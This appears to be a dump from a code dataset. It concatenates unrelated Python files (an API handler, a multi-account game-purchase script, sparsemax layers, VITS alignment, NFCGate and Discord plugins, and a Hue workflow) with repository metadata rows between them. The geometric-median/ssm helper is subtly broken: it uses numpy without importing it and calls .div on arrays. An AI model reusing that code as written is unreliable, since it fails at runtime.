"uc_team_group": {"type": str, "default": ''},
"uc_owner_group": {"type": str, "default": ''},
"uc_label": {"type": str, "default": ''},
}
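    # 'arguments' doubles as the expected input schema: execute() below
    # rejects the request when any of these keys is missing from stage_dict.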
def __init__(self, stage_dict):
super(system_add_new_usecase, self).__init__(stage_dict)
def execute(self, workspace_id=None, form_id=None, input_form_id=None, user_id=None):
try:
missing_set = set()
for key in self.arguments:
check_key = self.stage_dict.get(key, 'NotFound')
if check_key == 'NotFound':
missing_set.add(key)
if len(missing_set) != 0:
data = response_code.BAD_REQUEST
data['msg'] = 'Missing parameters: {}'.format(', '.join(missing_set))
return data
else:
usecase_info = self.stage_dict
usecase_info['workspace_id'] = workspace_id
usecase_info['uc_input_form'] = input_form_id
usecase_info['user_id'] = user_id
# usecase_info = {'workspace_id': workspace_id}
# uc_owner_group = self.stage_dict['uc_owner_group']
# usecase_info['uc_owner_group'] = uc_owner_group
data = usecase_mgr.add_new_usecase_setting(usecase_info)
                if data['code'] == 200:
                    usecase_id = data['data']['usecase_id']
                    # the return value of update_usecase_resource is not used
                    usecase_mgr.update_usecase_resource(workspace_id, usecase_id, usecase_info['uc_owner_group'])
                return data
except HttpError as e:
error_json = json.loads(e.content, strict=False)
data = error_json['error']
data["msg"] = data.pop("message")
logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
return data
except Exception as e:
logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
data = response_code.BAD_REQUEST
data['msg'] = str(e)
return data | 44.549296 | 121 | 0.5773 | 362 | 3,163 | 4.720994 | 0.28453 | 0.04096 | 0.081919 | 0.055588 | 0.229959 | 0.156817 | 0.118198 | 0.079579 | 0.079579 | 0.079579 | 0 | 0.002663 | 0.287702 | 3,163 | 71 | 122 | 44.549296 | 0.755881 | 0.085678 | 0 | 0.183333 | 0 | 0 | 0.174697 | 0.030503 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.116667 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e731796d279cf969e12aff158cf9fea92faa20ea | 1,394 | py | Python | allies/management/commands/volley_ally.py | kevincornish/HeckGuide | eb974d6b589908f5fc2308d41032a48941cc3d21 | [
"MIT"
] | 4 | 2022-02-16T10:19:11.000Z | 2022-03-17T03:34:26.000Z | allies/management/commands/volley_ally.py | kevincornish/HeckGuide | eb974d6b589908f5fc2308d41032a48941cc3d21 | [
"MIT"
] | 1 | 2022-02-17T14:02:31.000Z | 2022-03-31T03:56:42.000Z | allies/management/commands/volley_ally.py | kevincornish/HeckGuide | eb974d6b589908f5fc2308d41032a48941cc3d21 | [
"MIT"
] | 3 | 2022-02-17T06:13:52.000Z | 2022-03-23T21:37:21.000Z | from django.core.management.base import BaseCommand, CommandError
from api import HeckfireApi, TokenException
from django.conf import settings
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
    help = 'Volley an ally via supplied username'
def add_arguments(self, parser):
parser.add_argument('username', type=str)
def handle(self, *args, **options):
"""
        This command finds an ally by the supplied username and cycles
        through each token, purchasing the ally on each account.
        Usage: python manage.py volley_ally kevz
"""
staytoken = settings.STAY_ALIVE_TOKEN
tokens = settings.TOKENS
username = options['username']
for token in tokens:
api = HeckfireApi(token=token, staytoken=staytoken)
ally = api.get_ally_by_name(username)
try:
user_id = ally['allies'][0]["user_id"]
cost = ally['allies'][0]["cost"]
try:
api.collect_loot()
api.buy_ally(user_id, cost)
api.stay_alive()
logger.info(f"Buying '{username}', ID: {user_id}, Cost: {cost}")
except TokenException as e:
logger.info(f"Exception: {e}")
except IndexError as e:
logger.info(f"User does not exist") | 38.722222 | 82 | 0.607604 | 163 | 1,394 | 5.079755 | 0.503067 | 0.028986 | 0.036232 | 0.031401 | 0.033816 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002041 | 0.296987 | 1,394 | 36 | 83 | 38.722222 | 0.842857 | 0.126973 | 0 | 0.071429 | 0 | 0 | 0.131579 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73755fa550829d883f1573e3aa8b34fc04f814e | 7,030 | py | Python | src/tabnet/sparsemax.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet/sparsemax.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet/sparsemax.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | from typing import Any, Tuple, Union
import torch
import torch.nn as nn
from entmax import entmax_bisect
class _Sparsemax1(torch.autograd.Function):
"""adapted from https://github.com/aced125/sparsemax/tree/master/sparsemax"""
@staticmethod
def forward(ctx: Any, input: torch.Tensor, dim: int = -1) -> torch.Tensor: # noqa
input_dim = input.dim()
if input_dim <= dim or dim < -input_dim:
raise IndexError(
f"Dimension out of range (expected to be in range of [-{input_dim}, {input_dim - 1}], but got {dim})"
)
# Save operating dimension to context
ctx.needs_reshaping = input_dim > 2
ctx.dim = dim
if ctx.needs_reshaping:
ctx, input = _Sparsemax1._flatten_all_but_nth_dim(ctx, input)
# Translate by max for numerical stability
input = input - input.max(-1, keepdim=True).values.expand_as(input)
zs = input.sort(-1, descending=True).values
        rho = torch.arange(1, input.size()[-1] + 1)  # renamed from 'range' to avoid shadowing the built-in
        rho = rho.expand_as(input).to(input)
        # Determine sparsity of projection
        bound = 1 + rho * zs
        is_gt = bound.gt(zs.cumsum(-1)).type(input.dtype)
        k = (is_gt * rho).max(-1, keepdim=True).values
# Compute threshold
zs_sparse = is_gt * zs
# Compute taus
taus = (zs_sparse.sum(-1, keepdim=True) - 1) / k
taus = taus.expand_as(input)
output = torch.max(torch.zeros_like(input), input - taus)
# Save context
ctx.save_for_backward(output)
# Reshape back to original shape
if ctx.needs_reshaping:
ctx, output = _Sparsemax1._unflatten_all_but_nth_dim(ctx, output)
return output
@staticmethod
def backward(ctx: Any, grad_output: torch.Tensor) -> Tuple[torch.Tensor, None]: # noqa
output, *_ = ctx.saved_tensors
# Reshape if needed
if ctx.needs_reshaping:
ctx, grad_output = _Sparsemax1._flatten_all_but_nth_dim(ctx, grad_output)
# Compute gradient
nonzeros = torch.ne(output, 0)
num_nonzeros = nonzeros.sum(-1, keepdim=True)
sum = (grad_output * nonzeros).sum(-1, keepdim=True) / num_nonzeros
grad_input = nonzeros * (grad_output - sum.expand_as(grad_output))
# Reshape back to original shape
if ctx.needs_reshaping:
ctx, grad_input = _Sparsemax1._unflatten_all_but_nth_dim(ctx, grad_input)
return grad_input, None
@staticmethod
def _flatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
"""
Flattens tensor in all but 1 chosen dimension.
Saves necessary context for backward pass and unflattening.
"""
# transpose batch and nth dim
x = x.transpose(0, ctx.dim)
# Get and save original size in context for backward pass
original_size = x.size()
ctx.original_size = original_size
# Flatten all dimensions except nth dim
x = x.reshape(x.size(0), -1)
# Transpose flattened dimensions to 0th dim, nth dim to last dim
return ctx, x.transpose(0, -1)
@staticmethod
def _unflatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
"""
Unflattens tensor using necessary context
"""
# Tranpose flattened dim to last dim, nth dim to 0th dim
x = x.transpose(0, 1)
# Reshape to original size
x = x.reshape(ctx.original_size)
# Swap batch dim and nth dim
return ctx, x.transpose(0, ctx.dim)
class _Sparsemax2(torch.autograd.Function):
# credits to Yandex https://github.com/Qwicen/node/blob/master/lib/nn_utils.py
    # TODO: this version fails gradient checking (see the tests) -- investigate why.
"""
An implementation of sparsemax (Martins & Astudillo, 2016). See
:cite:`DBLP:journals/corr/MartinsA16` for detailed description.
By Ben Peters and Vlad Niculae
"""
@staticmethod
def forward(ctx, input, dim=-1): # noqa
"""sparsemax: normalizing sparse transform (a la softmax)
Parameters
----------
ctx : torch.autograd.function._ContextMethodMixin
input : torch.Tensor
any shape
dim : int
dimension along which to apply sparsemax
Returns
-------
output : torch.Tensor
same shape as input
"""
ctx.dim = dim
max_val, _ = input.max(dim=dim, keepdim=True)
input -= max_val # same numerical stability trick as for softmax
tau, supp_size = _Sparsemax2._threshold_and_support(input, dim=dim)
output = torch.clamp(input - tau, min=0)
ctx.save_for_backward(supp_size, output)
return output
@staticmethod
def backward(ctx, grad_output): # noqa
supp_size, output = ctx.saved_tensors
dim = ctx.dim
grad_input = grad_output.clone()
grad_input[output == 0] = 0
v_hat = grad_input.sum(dim=dim) / supp_size.to(output.dtype).squeeze()
v_hat = v_hat.unsqueeze(dim)
grad_input = torch.where(output != 0, grad_input - v_hat, grad_input)
return grad_input, None
@staticmethod
def _threshold_and_support(input, dim=-1):
"""Sparsemax building block: compute the threshold
Parameters
----------
input: torch.Tensor
any dimension
dim : int
dimension along which to apply the sparsemax
Returns
-------
tau : torch.Tensor
the threshold value
support_size : torch.Tensor
"""
input_srt, _ = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
rhos = _Sparsemax2._make_ix_like(input, dim)
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return tau, support_size
@staticmethod
def _make_ix_like(input, dim=0):
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
return rho.view(view).transpose(0, dim)
class Sparsemax(nn.Module):
def __init__(self, dim: int = -1):
super(Sparsemax, self).__init__()
self.dim = dim
self.sparsemax = _Sparsemax1.apply
def forward(self, input: torch.Tensor) -> torch.Tensor:
return self.sparsemax(input, self.dim)
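# Usage sketch:
#     sm = Sparsemax(dim=-1)
#     sm(torch.tensor([[0.1, 1.1, 2.1]]))  # -> tensor([[0., 0., 1.]]): sparse, sums to 1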
class EntmaxBisect(nn.Module):
def __init__(self, alpha: Union[nn.Parameter, float] = 1.5, dim: int = -1, n_iter: int = 50):
super().__init__()
self.dim = dim
self.n_iter = n_iter
self.alpha = alpha
def forward(self, X):
return entmax_bisect(
X, alpha=self.alpha, dim=self.dim, n_iter=self.n_iter
)
| 32.100457 | 117 | 0.616074 | 905 | 7,030 | 4.61768 | 0.234254 | 0.039483 | 0.012922 | 0.017229 | 0.23642 | 0.160804 | 0.137832 | 0.069873 | 0.049294 | 0.049294 | 0 | 0.013069 | 0.28165 | 7,030 | 218 | 118 | 32.247706 | 0.814455 | 0.238265 | 0 | 0.183486 | 0 | 0.009174 | 0.019433 | 0 | 0 | 0 | 0 | 0.004587 | 0 | 1 | 0.110092 | false | 0 | 0.036697 | 0.018349 | 0.275229 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e737a6ff2ca452102fe4ae2d50a7bb2e06a1ab1b | 1,423 | py | Python | subseasonal_toolkit/models/deb_ecmwf/ecmwf_utils.py | UtopiaLLC/subseasonal_toolkit | 35e120a010606d10a7d94cdfbf4cb8347a234dfb | [
"MIT"
] | 2 | 2021-10-02T07:37:52.000Z | 2022-01-27T07:46:31.000Z | subseasonal_toolkit/models/deb_ecmwf/ecmwf_utils.py | UtopiaLLC/subseasonal_toolkit | 35e120a010606d10a7d94cdfbf4cb8347a234dfb | [
"MIT"
] | null | null | null | subseasonal_toolkit/models/deb_ecmwf/ecmwf_utils.py | UtopiaLLC/subseasonal_toolkit | 35e120a010606d10a7d94cdfbf4cb8347a234dfb | [
"MIT"
] | 3 | 2021-09-27T16:53:35.000Z | 2021-12-27T21:39:07.000Z | from scipy.spatial.distance import cdist, euclidean
def geometric_median(X, eps=1e-5):
"""Computes the geometric median of the columns of X, up to a tolerance epsilon.
The geometric median is the vector that minimizes the mean Euclidean norm to
each column of X.
"""
y = np.mean(X, 0)
while True:
D = cdist(X, [y])
nonzeros = (D != 0)[:, 0]
Dinv = 1 / D[nonzeros]
Dinvs = np.sum(Dinv)
W = Dinv / Dinvs
T = np.sum(W * X[nonzeros], 0)
num_zeros = len(X) - np.sum(nonzeros)
if num_zeros == 0:
y1 = T
elif num_zeros == len(X):
return y
else:
R = (T - y) * Dinvs
r = np.linalg.norm(R)
rinv = 0 if r == 0 else num_zeros/r
y1 = max(0, 1-rinv)*T + min(1, rinv)*y
if euclidean(y, y1) < eps:
return y1
y = y1
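# Usage sketch: each row of X is a point; the result minimizes the mean
# Euclidean distance to the rows (Weiszfeld-type iteration above).
#     X = np.array([[0., 0.], [1., 0.], [0., 1.]])
#     geometric_median(X)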
def ssm(X, alpha=1):
"""Computes stabilized sample mean (Orenstein, 2019) of each column of X
Args:
alpha: if infinity, recovers the mean; if 0 approximates median
"""
# Compute first, second, and third uncentered moments
mu = np.mean(X,0)
mu2 = np.mean(np.square(X),0)
mu3 = np.mean(np.power(X,3),0)
# Return mean - (third central moment)/(3*(2+numrows(X))*variance)
return mu - (mu3 - 3*mu*mu2+2*np.power(mu,3)).div(3*(2+alpha*X.shape[0])*(mu2 - np.square(mu)))
| 30.276596 | 99 | 0.550246 | 222 | 1,423 | 3.504505 | 0.391892 | 0.030848 | 0.046272 | 0.033419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042051 | 0.314828 | 1,423 | 46 | 100 | 30.934783 | 0.755897 | 0.305692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.035714 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7390c6ea9997d92c5a59b802c520427aaf2e179 | 2,493 | py | Python | espnet2/gan_tts/vits/monotonic_align/__init__.py | roshansh-cmu/espnet | 5fa6dcc4e649dc66397c629d0030d09ecef36b80 | [
"Apache-2.0"
] | null | null | null | espnet2/gan_tts/vits/monotonic_align/__init__.py | roshansh-cmu/espnet | 5fa6dcc4e649dc66397c629d0030d09ecef36b80 | [
"Apache-2.0"
] | null | null | null | espnet2/gan_tts/vits/monotonic_align/__init__.py | roshansh-cmu/espnet | 5fa6dcc4e649dc66397c629d0030d09ecef36b80 | [
"Apache-2.0"
] | null | null | null | """Maximum path calculation module.
This code is based on https://github.com/jaywalnut310/vits.
"""
import warnings
import numpy as np
import torch
from numba import njit, prange
try:
from .core import maximum_path_c
is_cython_avalable = True
except ImportError:
is_cython_avalable = False
warnings.warn(
"Cython version is not available. Fallback to 'EXPERIMETAL' numba version. "
"If you want to use the cython version, please build it as follows: "
"`cd espnet2/gan_tts/vits/monotonic_align; python setup.py build_ext --inplace`"
)
def maximum_path(neg_x_ent: torch.Tensor, attn_mask: torch.Tensor) -> torch.Tensor:
"""Calculate maximum path.
Args:
neg_x_ent (Tensor): Negative X entropy tensor (B, T_feats, T_text).
attn_mask (Tensor): Attention mask (B, T_feats, T_text).
Returns:
Tensor: Maximum path tensor (B, T_feats, T_text).
"""
device, dtype = neg_x_ent.device, neg_x_ent.dtype
neg_x_ent = neg_x_ent.cpu().numpy().astype(np.float32)
path = np.zeros(neg_x_ent.shape, dtype=np.int32)
t_t_max = attn_mask.sum(1)[:, 0].cpu().numpy().astype(np.int32)
t_s_max = attn_mask.sum(2)[:, 0].cpu().numpy().astype(np.int32)
if is_cython_avalable:
maximum_path_c(path, neg_x_ent, t_t_max, t_s_max)
else:
maximum_path_numba(path, neg_x_ent, t_t_max, t_s_max)
return torch.from_numpy(path).to(device=device, dtype=dtype)
@njit
def maximum_path_each_numba(path, value, t_y, t_x, max_neg_val=-np.inf):
"""Calculate a single maximum path with numba."""
index = t_x - 1
for y in range(t_y):
for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)):
if x == y:
v_cur = max_neg_val
else:
v_cur = value[y - 1, x]
if x == 0:
if y == 0:
v_prev = 0.0
else:
v_prev = max_neg_val
else:
v_prev = value[y - 1, x - 1]
value[y, x] += max(v_prev, v_cur)
for y in range(t_y - 1, -1, -1):
path[y, index] = 1
if index != 0 and (index == y or value[y - 1, index] < value[y - 1, index - 1]):
index = index - 1
@njit(parallel=True)
def maximum_path_numba(paths, values, t_ys, t_xs):
"""Calculate batch maximum path with numba."""
for i in prange(paths.shape[0]):
maximum_path_each_numba(paths[i], values[i], t_ys[i], t_xs[i])
| 31.1625 | 88 | 0.607702 | 400 | 2,493 | 3.5625 | 0.295 | 0.092632 | 0.044211 | 0.023158 | 0.13193 | 0.10386 | 0.029474 | 0.029474 | 0.029474 | 0.029474 | 0 | 0.01978 | 0.269956 | 2,493 | 79 | 89 | 31.556962 | 0.763187 | 0.162856 | 0 | 0.08 | 0 | 0 | 0.107458 | 0.018155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06 | false | 0 | 0.12 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e739779fbb9f7ff0a4abdae832fc3a6922d47f68 | 620 | py | Python | plugins/mod_log.py | nfcgate/server | 51dd45e64f91e765b1a0c9d5e5f52933006fb212 | [
"Apache-2.0"
] | 25 | 2016-01-13T21:59:00.000Z | 2022-02-05T07:55:18.000Z | plugins/mod_log.py | salmg/server | e5b485c4e2517aa741ed70948a92c61c1bc73f62 | [
"Apache-2.0"
] | 3 | 2018-05-30T13:42:12.000Z | 2020-10-13T09:56:01.000Z | plugins/mod_log.py | salmg/server | e5b485c4e2517aa741ed70948a92c61c1bc73f62 | [
"Apache-2.0"
] | 19 | 2015-08-23T02:53:33.000Z | 2021-09-28T20:53:50.000Z | from plugins.c2c_pb2 import NFCData
from plugins.c2s_pb2 import ServerData
def format_data(data):
if len(data) == 0:
return ""
nfc_data = NFCData()
nfc_data.ParseFromString(data)
letter = "C" if nfc_data.data_source == NFCData.CARD else "R"
initial = "(initial) " if nfc_data.data_type == NFCData.INITIAL else ""
return "%s: %s%s" % (letter, initial, bytes(nfc_data.data))
def handle_data(log, data):
server_message = ServerData()
server_message.ParseFromString(data)
log(ServerData.Opcode.Name(server_message.opcode), format_data(server_message.data))
return data
| 26.956522 | 88 | 0.701613 | 85 | 620 | 4.929412 | 0.388235 | 0.083532 | 0.078759 | 0.062053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009843 | 0.180645 | 620 | 22 | 89 | 28.181818 | 0.814961 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7398960f4dd8de46cd8fd73487b06b0c4d4c812 | 3,191 | py | Python | rowboat/plugins/join.py | DeJayDev/speedboat | ecce2075b69d8e18de17fac0daa702eb59cfcddd | [
"MIT"
] | 16 | 2021-01-03T14:00:48.000Z | 2022-03-01T21:03:27.000Z | rowboat/plugins/join.py | DeJayDev/speedboat | ecce2075b69d8e18de17fac0daa702eb59cfcddd | [
"MIT"
] | 14 | 2020-11-20T07:00:09.000Z | 2022-03-12T01:02:08.000Z | rowboat/plugins/join.py | SethBots/speedboat | e516261e9d34031045c70522955e8babe3d8ec6e | [
"MIT"
] | 9 | 2018-09-12T20:50:44.000Z | 2020-06-20T15:58:52.000Z | from datetime import datetime, timedelta
import gevent
from disco.types.base import SlottedModel
from disco.types.guild import VerificationLevel
from disco.util.snowflake import to_datetime
from rowboat.plugins import RowboatPlugin as Plugin
from rowboat.types import Field, snowflake
from rowboat.types.plugin import PluginConfig
class JoinPluginConfigAdvanced(SlottedModel):
low = Field(int, default=0)
medium = Field(int, default=5)
high = Field(int, default=10)
highest = Field(int, default=30, alias='extreme') # Disco calls it extreme, the client calls it Highest.
class JoinPluginConfig(PluginConfig):
join_role = Field(snowflake, default=None)
security = Field(bool, default=False)
advanced = Field(JoinPluginConfigAdvanced)
@Plugin.with_config(JoinPluginConfig)
class JoinPlugin(Plugin):
@Plugin.listen('GuildMemberAdd')
def on_guild_member_add(self, event):
if event.member.user.bot:
return # I simply do not care
verification_level = event.guild.verification_level
if not event.config.security:
# Let's assume that if the server has join roles enabled and security disabled,
# they don't care about email verification.
try:
event.member.add_role(event.config.join_role)
            except Exception:
print("Failed to add_role in join plugin for user {} in {}. join_role may be None? It is currently: {}".format(
event.member.id, event.guild.id, event.config.join_role))
return
if verification_level is VerificationLevel.LOW: # "Must have a verified email on their Discord account"
# We take a "guess" that if the server has join roles enabled, they don't care about email verification.
            # A single delayed grant is enough; an immediate add_role here would duplicate it.
            gevent.spawn_later(event.config.advanced.low, event.member.add_role, event.config.join_role)
return
if verification_level is VerificationLevel.MEDIUM:
gevent.spawn_later(event.config.advanced.medium, event.member.add_role, event.config.join_role)
if verification_level is VerificationLevel.HIGH:
gevent.spawn_later(event.config.advanced.high, event.member.add_role, event.config.join_role)
if verification_level is VerificationLevel.EXTREME:
gevent.spawn_later(event.config.advanced.highest, event.member.add_role, event.config.join_role)
@Plugin.command('debugdelay', '[length:int]', group='join', level=-1)
def trigger_delay(self, event, length: int = None):
length = length if length else 10
msg = event.channel.send_message("Sending later...")
        def send_timediff():
            elapsed = (datetime.now() - to_datetime(msg.id)) / timedelta(seconds=1)
            event.channel.send_message("Scheduled for {} after trigger, took {}".format(length, elapsed))

        gevent.spawn_later(length, send_timediff)
| 42.546667 | 127 | 0.67095 | 391 | 3,191 | 5.378517 | 0.332481 | 0.062767 | 0.049929 | 0.063243 | 0.386591 | 0.386591 | 0.320019 | 0.287684 | 0.194009 | 0.194009 | 0 | 0.004117 | 0.238797 | 3,191 | 74 | 128 | 43.121622 | 0.861671 | 0.109683 | 0 | 0.096154 | 0 | 0.019231 | 0.083275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0.019231 | 0.153846 | 0.019231 | 0.480769 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73ab7b64cfe244e1ca49e1be6932024a4d3924d | 7,062 | py | Python | hue/logic/action.py | dnnsmnstrr/workflows | 104b370292060b7011120e7decb3db26275ae7f5 | [
"Unlicense"
] | 4 | 2020-08-12T21:56:07.000Z | 2021-06-01T09:11:12.000Z | hue/logic/action.py | dnnsmnstrr/workflows | 104b370292060b7011120e7decb3db26275ae7f5 | [
"Unlicense"
] | null | null | null | hue/logic/action.py | dnnsmnstrr/workflows | 104b370292060b7011120e7decb3db26275ae7f5 | [
"Unlicense"
] | 1 | 2021-12-06T02:40:43.000Z | 2021-12-06T02:40:43.000Z | # encoding: utf-8
from __future__ import unicode_literals
import colorsys
import datetime
import json
import os
import random
import sys
import time
from packages.workflow import Workflow3 as Workflow
import colors
import harmony
import request
import setup
import utils
class HueAction:
def __init__(self):
self.hue_request = request.HueRequest()
def _get_xy_color(self, color, gamut):
"""Validate and convert hex color to XY space."""
return colors.Converter(gamut).hex_to_xy(utils.get_color_value(color))
def _get_random_xy_color(self, gamut):
random_color = colorsys.hsv_to_rgb(random.random(), 1, 1)
random_color = tuple([255 * x for x in random_color])
return colors.Converter(gamut).rgb_to_xy(*random_color)
def _set_palette(self, lids, palette):
for index, lid in enumerate(lids):
self.hue_request.request(
'put',
'/lights/%s/state' % lid,
json.dumps({'xy': palette[index]})
)
def _shuffle_group(self, group_id):
lights = utils.get_lights()
lids = utils.get_group_lids(group_id)
# Only shuffle the lights that are on
on_lids = [lid for lid in lids if lights[lid]['state']['on']]
on_xy = [lights[lid]['state']['xy'] for lid in on_lids]
shuffled = list(on_xy)
# Shuffle until all indexes are different (generate a derangement)
while not all([on_xy[i] != shuffled[i] for i in range(len(on_xy))]):
random.shuffle(shuffled)
self._set_palette(on_lids, shuffled)
def _set_harmony(self, group_id, mode, root):
lights = utils.get_lights()
lids = utils.get_group_lids(group_id)
palette = []
on_lids = [lid for lid in lids if lights[lid]['state']['on']]
args = (len(on_lids), '#%s' % utils.get_color_value(root))
harmony_colors = getattr(harmony, mode)(*args)
for lid in on_lids:
gamut = colors.get_light_gamut(lights[lid]['modelid'])
xy = self._get_xy_color(harmony_colors.pop(), gamut)
palette.append(xy)
self._set_palette(on_lids, palette)
def execute(self, action):
is_light = action[0] == 'lights'
is_group = action[0] == 'groups'
if not is_light and not is_group:
return
rid = action[1]
function = action[2]
value = action[3] if len(action) > 3 else None
lights = utils.get_lights()
groups = utils.get_groups()
# Default API request parameters
method = 'put'
endpoint = '/groups/%s/action' % rid if is_group else '/lights/%s/state' % rid
if function == 'off':
data = {'on': False}
elif function == 'on':
data = {'on': True}
elif function == 'bri':
value = int((float(value) / 100) * 255) if value else 255
data = {'bri': value}
elif function == 'shuffle':
if not is_group:
print('Shuffle can only be called on groups.'.encode('utf-8'))
return
self._shuffle_group(rid)
return True
elif function == 'rename':
endpoint = '/groups/%s' % rid if is_group else '/lights/%s' % rid
data = {'name': value}
elif function == 'effect':
data = {'effect': value}
elif function == 'color':
if value == 'random':
if is_group:
gamut = colors.GamutA
data = {'xy': self._get_random_xy_color(gamut)}
else:
gamut = colors.get_light_gamut(lights[rid]['modelid'])
data = {'xy': self._get_random_xy_color(gamut)}
else:
try:
if is_group:
gamut = colors.GamutA
else:
gamut = colors.get_light_gamut(lights[rid]['modelid'])
data = {'xy': self._get_xy_color(value, gamut)}
except ValueError:
print('Error: Invalid color. Please use a 6-digit hex color.'.encode('utf-8'))
return
elif function == 'harmony':
if not is_group:
print('Color harmonies can only be set on groups.'.encode('utf-8'))
return
            root = action[4] if len(action) > 4 else None
if value not in harmony.MODES:
print('Invalid harmony mode.'.encode('utf-8'))
return
self._set_harmony(rid, value, root)
return
elif function == 'reminder':
try:
time_delta_int = int(value)
except ValueError:
print('Error: Invalid time delta for reminder.'.encode('utf-8'))
return
reminder_time = datetime.datetime.utcfromtimestamp(time.time() + time_delta_int)
method = 'post'
data = {
'name': 'Alfred Hue Reminder',
'command': {
'address': self.hue_request.api_path + endpoint,
'method': 'PUT',
'body': {'alert': 'lselect'},
},
'time': reminder_time.replace(microsecond=0).isoformat(),
}
endpoint = '/schedules'
elif function == 'set':
# if bridge is deconz, scenes are set differently.
# what we need is groups:group_id:scenes:scene_id:recall
is_deconz = False
try:
if workflow.stored_data("full_state")["config"]["modelid"] == "deCONZ":
is_deconz = True
            except Exception:
                # not sure if hue also returns config/modelid
                pass
if is_deconz:
method = 'put'
endpoint = '/groups/{}/scenes/{}/recall'.format(rid, value)
data = {}
else:
data = {'scene': value}
elif function == 'save':
lids = utils.get_group_lids(rid)
method = 'post'
endpoint = '/scenes'
data = {'name': value, 'lights': lids, 'recycle': False}
else:
return
# Make the request
self.hue_request.request(method, endpoint, json.dumps(data))
return
def main(workflow):
# Handle multiple queries separated with '|' (pipe) character
queries = workflow.args[0].split('|')
for query_str in queries:
query = query_str.split(':')
if query[0] == 'set_bridge':
setup.set_bridge(query[1] if len(query) > 1 else None)
else:
action = HueAction()
try:
action.execute(query)
print(('Action completed! <%s>' % query_str).encode('utf-8'))
except ValueError:
pass
if __name__ == '__main__':
workflow = Workflow()
